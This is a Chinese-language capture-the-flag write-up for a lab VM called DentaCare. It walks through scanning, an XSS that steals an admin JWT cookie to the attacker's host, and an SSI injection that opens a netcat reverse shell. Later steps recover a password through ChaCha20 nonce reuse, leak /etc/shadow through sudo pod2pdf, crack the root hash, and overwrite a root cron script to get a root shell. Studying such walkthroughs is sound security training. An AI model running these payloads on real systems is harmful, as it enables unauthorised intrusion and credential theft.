信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.154  08:00:27:35:ec:20       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:e5:17       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.085 seconds (122.78 hosts/sec). 4 responded
❯ export ip=192.168.60.154
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.154:22
Open 192.168.60.154:80
Open 192.168.60.154:8000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-24 09:16 CST
Initiating ARP Ping Scan at 09:16
Scanning 192.168.60.154 [1 port]
Completed ARP Ping Scan at 09:16, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:16
Completed Parallel DNS resolution of 1 host. at 09:16, 13.00s elapsed
DNS resolution of 1 IPs took 13.00s. Mode: Async [#: 1, OK: 0, NX: 0, DR: 1, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 09:16
Scanning 192.168.60.154 [3 ports]
Discovered open port 22/tcp on 192.168.60.154
Discovered open port 80/tcp on 192.168.60.154
Discovered open port 8000/tcp on 192.168.60.154
Completed SYN Stealth Scan at 09:16, 0.03s elapsed (3 total ports)
Nmap scan report for 192.168.60.154
Host is up, received arp-response (0.0012s latency).
Scanned at 2025-04-24 09:16:55 CST for 0s

PORT     STATE SERVICE  REASON
22/tcp   open  ssh      syn-ack ttl 64
80/tcp   open  http     syn-ack ttl 64
8000/tcp open  http-alt syn-ack ttl 64
MAC Address: 08:00:27:35:EC:20 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.37 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

枚举目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.154
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 43069]
/contact              (Status: 500) [Size: 27322]
/about                (Status: 200) [Size: 22975]
/blog                 (Status: 200) [Size: 23021]
/services             (Status: 200) [Size: 21296]
/admin                (Status: 302) [Size: 189] [--> /]
/comment              (Status: 405) [Size: 153]
/console              (Status: 200) [Size: 1563]
/doctors              (Status: 200) [Size: 24697]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

浏览器访问一下，发现在主页中存在域名

编辑hosts文件，添加域名

1 2	❯ echo "$ip dentacare.hmv"\|sudo tee /etc/hosts 192.168.60.154 dentacare.hmv

枚举子域名无果，发现有个返回500的网页/contact

得到报错信息，提示未找到contact.html

并且是使用python的flask框架启动的服务，模板引擎是Jinja2

浏览器直接访问/console

果然存在debugger的页面

不过需要利用pin码进行登录，但一般需要靶机上存在LFI SSTI诸如此类的漏洞才可以进行收集信息

可以在/comment中存在交互点，可以发送反馈信息，猜测管理员可能会定期查看

尝试发送XSS的Payload获取管理员的Cookie

<script>document.location='http://192.168.60.100:8000/xss.php?c='+document.cookie</script>

监听一下8000端口

果然拿到了Cookie

❯ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.60.154 - - [24/Apr/2025 15:26:04] code 404, message File not found
192.168.60.154 - - [24/Apr/2025 15:26:04] "GET /xss.php?c=Authorization=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJEZW50YUNhcmUgQ29ycG9yYXRpb24gIiwiaWF0IjoxNzEyNTc0NTEyLCJleHAiOjE3NDQxMTA1MTIsImF1ZCI6ImRlbnRhY2FyZS5obXYiLCJzdWIiOiJoZWxwZGVza0BkZW50YWNhcmUuaG12IiwiR2l2ZW5OYW1lIjoiUGF0cmljayIsIlN1cm5hbWUiOiJQZXRpdCIsIkVtYWlsIjoiYWRtaW5AZGVudGFjYXJlLmhtdiIsIlJvbGUiOlsiQWRtaW5pc3RyYXRvciIsIlByb2plY3QgQWRtaW5pc3RyYXRvciJdfQ.FIMxmUCOL3a4ThN5z-7VDN8OxBK7W0krHlcVktAiZtx3KXSQsbno1q1MRUL9JMPTJeqoTr-bRL2KWyr5Kv7JnQ HTTP/1.1" 404 -
192.168.60.154 - - [24/Apr/2025 15:27:02] code 404, message File not found

Cookie是JWT编码，尝试解码一下

其实不用解码也行，利用Cookie-editor填写Cookie

携带Cookie访问/admin则会跳转到http://dentacare.hmv:8000

跳转后存在一个表单，可以输入字符信息等

SSI 服务器端包含

经过不断尝试可以得知存在SSI(服务端包含)漏洞

具体可以参考服务器端包含/边缘侧包含注入 - HackTricks

直接利用以下payload反弹shell即可

用户提权

监听端口

拿到webshell了

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from dentacare-192.168.60.154-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/dentacare~192.168.60.154_Linux_x86_64/2025_04_24-15_40_13-771.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@dentacare:/var/www/html$

通过查看apache的配置文件发现确实是启用了了SSI功能

可以看到patient_name.shtml此文件内容就包含我们执行的命令

www-data@dentacare:/opt/carries$ cat /etc/apache2/sites-available/000-default.conf
<VirtualHost *:8000>
    ServerAdmin webmaster@localhost
    DocumentRoot /var/www/html

<Directory "/var/www/html">
     AllowOverride All
    Options +Includes +ExecCGI
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
    DirectoryIndex  default.shtml index.shtml
</Directory>

    <FilesMatch "\.php$">
        SetHandler application/x-httpd-php
    </FilesMatch>

    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
www-data@dentacare:/opt/carries$ cat /var/www/html/patient_name.shtml
<html><body><h1>Patient with unpaid balance added to database :</h1>"<!--#exec cmd="mkfifo /tmp/foo;nc 192.168.60.100 4444 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->"</body></html>

查看/etc/passwd，得知存在dentist用户

1
2
3

www-data@dentacare:/opt/carries$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
dentist:x:1000:1000:,,,:/home/dentist:/bin/bash

明文碰撞

并且在/opt下找到了属于此用户的文件夹/carries

在crypted_potion.txt好像存在几段密文，还有个python的脚本文件farewell_the_carries.py

不过potion.txt文件权限为600，所以没法读

www-data@dentacare:/opt$ ls -al
total 16
drwxr-xr-x  4 root     root     4096 Apr 12  2024 .
drwxr-xr-x 18 root     root     4096 Mar  9  2024 ..
drwxr-xr-x  7 www-data www-data 4096 Apr 24 09:45 appli
drwxr-xr-x  3 dentist  dentist  4096 Apr 12  2024 carries
www-data@dentacare:/opt$ cd carries/
www-data@dentacare:/opt/carries$ ls -al
total 24
drwxr-xr-x 3 dentist dentist 4096 Apr 12  2024 .
drwxr-xr-x 4 root    root    4096 Apr 12  2024 ..
drwxr-xr-x 5 root    root    4096 Apr 12  2024 .env
-rwxr--r-- 1 dentist dentist 1122 Apr 12  2024 crypted_potion.txt
-rwxr-xr-x 1 dentist dentist  923 Apr 12  2024 farewell_the_carries.py
-rw------- 1 dentist dentist  357 Apr 12  2024 potion.txt
www-data@dentacare:/opt/carries$ cat crypted_potion.txt
58b8839c52139a58f4f2d5265fb67a85ebd48c52b430823e
a12c2cd43e39b0651ee7a65dd19cdf0eeacf472286368c8edc5efaf6530672727c6d80cc495485dfd4590371ab701388dac27c3993b3776f92ade39492b240596eeb134589ee63334d870545786ababd41e569dd19e46c16176d64d98f0e2e21e255dd5029be93124fddb99f5e1df45766ccb10b777f710adbf0b51ac5a5a83fa07f32b39573ecfc7eaa22140fd00e531308fdfb591403a446751c724e11ccc40c6464374185325742d976b98b0f185c0e5c6e
a92478dc3539a5610bf0a6099991de04fbc00b6b897a829f995fe2b41a5e4b307861cdcd484e93d39d6405278f70138ccfcc7a3cdfe77c65dcbde59a96b74a172bf91d419eba6f37498d09556a3eb0a841e469c019fe6253172266d7dd1c3130f855c1593fbe9c0e59c7f09e4d14a3576c88e33c6c7f724bc6f3b510dfb9e92ca06922b68e31b9c964e52d1414db5d421a12a5b20d2505b8183b10673d1ac0c40539232501cb7a035d9872f89b12035d500f2e428fd9de94cef5fba1bc03cd8779dc7c77d7c53cd07ecc13fe53a36bc2e0d8ff2df960450f61861af42bd6acc7748cebbf29578e30948538158caa59b1dbbc1dfc27517485f504f47b41f27e211ae6f02f0f4d9b406627698344a8773e71bc68ef2515a004c8a7cad09cc0fc6518823ae224d46a00f547e7d85a4348aed1bf24ebbda605338178cfb7b0a4d02add39eebb589d6089259072a734935b8a9f4f4d8fbca8a611785735f8776bd69c6b1256c7a8www-data@dentacare:/opt/carries$
www-data@dentacare:/opt/carries$ cat farewell_the_carries.py
from Crypto.Cipher import ChaCha20
import os

def encryptMessage(message, key, nonce):
    cipher = ChaCha20.new(key=key, nonce=nonce)
    ciphertext = cipher.encrypt(message)
    return ciphertext

def writeData(data):
    with open("crypted_potion.txt", "w") as f:
        f.write(data)

def readFlagFromFile(filename="potion.txt"):
    with open(filename, "rb") as f:
        return f.read()

if __name__ == "__main__":
    message = b"After years hidden in my lab, I've done it! A magical concoction "
    message += b"that eradicates cavities forever has been brewed! Prepare for a "
    message += b"revolution in dentistry, my fellow tooth warriors!"

    key, iv = os.urandom(32), os.urandom(24)

    flag = readFlagFromFile()

    announcement = encryptMessage(message, key, iv)
    potion = encryptMessage(flag, key, iv)

    data = iv.hex() + "\n" + announcement.hex() + "\n" + potion.hex()
    writeData(data)

直接丢给GPT，得知代码使用 ChaCha20 流密码对两段数据进行加密，读取potion.txt进行加密

并且将message中的明文公告信息和potion.txt中的数据分别加密进行拼接，将加密结果保存在

crypted_potion.txt中

不过 announcement和potion在加密的时候使用的是同一个key 和iv

存在密钥和nonce复用的情况，所以可以尝试爆破，逆向得到potion明文

我们先将crypted_potion.txt文本下载下来

www-data@dentacare:/opt/carries$ ls
crypted_potion.txt  farewell_the_carries.py  potion.txt
www-data@dentacare:/opt/carries$
[!] Session detached ⇲
(Penelope)─(Session [1])> download crypted_potion.txt
[+] Download OK '/home/Pepster/.penelope/dentacare~192.168.60.154_Linux_x86_64/downloads/opt/carries/crypted_potion.txt'
(Penelope)─(Session [1])>

让GPT写个脚本解密一下

# 已知的明文
message = b"After years hidden in my lab, I've done it! A magical concoction "
message += b"that eradicates cavities forever has been brewed! Prepare for a "
message += b"revolution in dentistry, my fellow tooth warriors!"

# 从文件读取加密数据
with open("crypted_potion.txt", "r") as f:
    lines = f.read().split("\n")
    iv_hex, announcement_hex, potion_hex = lines[0], lines[1], lines[2]

announcement = bytes.fromhex(announcement_hex)
potion = bytes.fromhex(potion_hex)

# 计算密钥流（需确保message长度 >= announcement长度）
keystream = bytes([a ^ m for a, m in zip(announcement, message)])

# 解密flag（需确保keystream长度 >= potion长度）
flag = bytes([p ^ k for p, k in zip(potion, keystream)])

print("Decrypted Flag:", flag.decode())

尝试执行一下

猜测EternalSmile2024!为用户密码

1
2

❯ python3 exp.py
Decrypted Flag: In my latest dental alchemy experiments, I've merged the simple effectiveness of baking soda with the mystical energies of lunar dust. As a result, 'EternalSmile2024!' was born, a

Root提权

尝试ssh连接一下

❯ ssh dentist@$ip
The authenticity of host '192.168.60.154 (192.168.60.154)' can't be established.
ED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:17: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.154' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux dentacare 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
dentist@dentacare:~$ cat user.txt
ef2f3bab2950c28547e17d32f864f172

文件读取

发现用户存在sudo权限，可以执行/usr/bin/pod2pdf

dentist@dentacare:~$ sudo -l
Matching Defaults entries for dentist on dentacare:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User dentist may run the following commands on dentacare:
    (ALL : ALL) NOPASSWD: /usr/bin/pod2pdf

查询得知pod2pdf是Perl 的 POD 文档转 PDF 工具

其实你可以完全不用参考正确的命令用法，只需要查看example得知如何包含文件

至于能否正常生成pdf无所谓了

要使用配置文件，可以通过选项 C<@/path/to/configfile.conf> 调用 pod2pdf。

例如，如果您希望始终在 PDF 文件中包含公司徽标、时间戳和版权声明，可以创建一个名为 F<mycompany.conf> 的文件，内容如下：

 --icon "/path/to/your/logo.png"
 --footer-text "Copyright 2007 MyCompany Limited"
 --timestamp

然后可以通过以下方式调用 pod2pdf：

 pod2pdf @/path/to/mycompany.conf input.pod >output.pdf

利用@/path/to/mycompany.conf将/etc/shadow包含进来，因为pod2pdf正常处理配置文件肯定会报错

那么报错信息中就会把/etc/shadow中的第一行信息外带出来

dentist@dentacare:/tmp$ sudo  /usr/bin/pod2pdf @/etc/shadow >aaa.pdf
Use of uninitialized value in multiplication (*) at /usr/bin/pod2pdf line 94, <OPT> line 24.
Can't open root:$6$oVM8onySfQyyGID/$7TWQ22OZhZJGE.zsxTKtIj/uyEoUmxc.SCYaghAfbM6VUqQVcenX9DQCO2szyJp9iT5fHoGQVb4eeG7rYq9fQ.:19826:0:99999:7::: for reading: No such file or directory
 at /usr/bin/pod2pdf line 115.

尝试利用john爆破一下

❯ echo 'root:$6$oVM8onySfQyyGID/$7TWQ22OZhZJGE.zsxTKtIj/uyEoUmxc.SCYaghAfbM6VUqQVcenX9DQCO2szyJp9iT5fHoGQVb4eeG7rYq9fQ.:19826:0:99999:7:::'>hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 6 for all loaded hashes
Cost 2 (algorithm specific iterations) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sabertooth       (root)
1g 0:00:00:26 DONE (2025-04-24 16:39) 0.03831g/s 3832p/s 3832c/s 3832C/s schubert..rosnah
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

直接切换用户，还改了root flag的文件名，作者就是不想让你包含到内容，哈哈哈🤣

dentist@dentacare:/tmp$ su root
Password:
root@dentacare:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@dentacare:/tmp# cd /root/
root@dentacare:~# ls
r00t.txt
root@dentacare:~# cat r00t.txt
31b80e67e233ed342639f36b10ecb64d

BUG设计缺陷

hydra爆破

通过查看/etc/ssh/sshd_config，可以得知是允许root用户登录ssh的

所以可以尝试硬爆破，只不过比较慢而已，在rockyou中的十万多行

dentist@dentacare:/tmp$ cat /etc/ssh/sshd_config|grep -v '^#'|grep ' '
Include /etc/ssh/sshd_config.d/*.conf
PermitRootLogin yes
KbdInteractiveAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
❯ grep -nr "^sabertooth$" /usr/share/wordlists/rockyou.txt
100008:sabertooth

Crontab定时任务

利用pspy64监控系统进程

可以看到系统会定期利用node执行read_comment.js这个JavaScript文件

也就是管理员会定期访问我们提交的comments，导致XSS泄露Cookie

1
2

2025/04/24 10:51:02 CMD: UID=0     PID=1266782 | /usr/bin/node /opt/appli/.config/read_comment.js
2025/04/24 10:51:03 CMD: UID=0     PID=1266784 | /root/.cache/puppeteer/chrome/linux-123.0.6312.105/chrome-linux64/chrome --allow-pre-commit-input --disable-background-networking --disable-background-timer-throttling --disable-backgrounding-occluded-windows --disable-breakpad --disable-client-side-phishing-detection --disable-component-extensions-with-background-pages --disable-component-update --disable-default-apps --disable-dev-shm-usage --disable-extensions --disable-field-trial-config --disable-hang-monitor --disable-infobars --disable-ipc-flooding-protection --disable-popup-blocking --disable-prompt-on-repost --disable-renderer-backgrounding --disable-search-engine-choice-screen --disable-sync --enable-automation --export-tagged-pdf --generate-pdf-document-outline --force-color-profile=srgb --metrics-recording-only --no-first-run --password-store=basic --use-mock-keychain --disable-features=Translate,AcceptCHFrame,MediaRouter,OptimizationHints,ProcessPerSiteUpToMainFrameThreshold --enable-features=NetworkServiceInProcess2 --headless=new --hide-scrollbars --mute-audio about:blank --no-sandbox --disable-setuid-sandbox --remote-debugging-port=0 --user-data-dir=/tmp/puppeteer_dev_chrome_profile-prTbiE

然而read_comment.js此文件是隶属于www-data用户的

所以我们可以直接修改文件

1
2
3

www-data@dentacare:/var/www$ cd /opt/appli/.config/
www-data@dentacare:/opt/appli/.config$ rm read_comment.js
www-data@dentacare:/opt/appli/.config$ echo "require('child_process').exec('nc -e /bin/bash 192.168.60.100 4444')">read_comment.js

坐等命令执行，即可收到root的反弹shell

[+] Got reverse shell from dentacare-192.168.60.154-Linux-x86_64 😍️ Assigned SessionID <2>
[!] Session detached ⇲

(Penelope)─(Session [1])> interact 2
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [2], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/dentacare~192.168.60.154_Linux_x86_64/2025_04_24-17_02_01-100.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@dentacare:~# id
uid=0(root) gid=0(root) groups=0(root)
root@dentacare:~# cat /root/r00t.txt
31b80e67e233ed342639f36b10ecb64d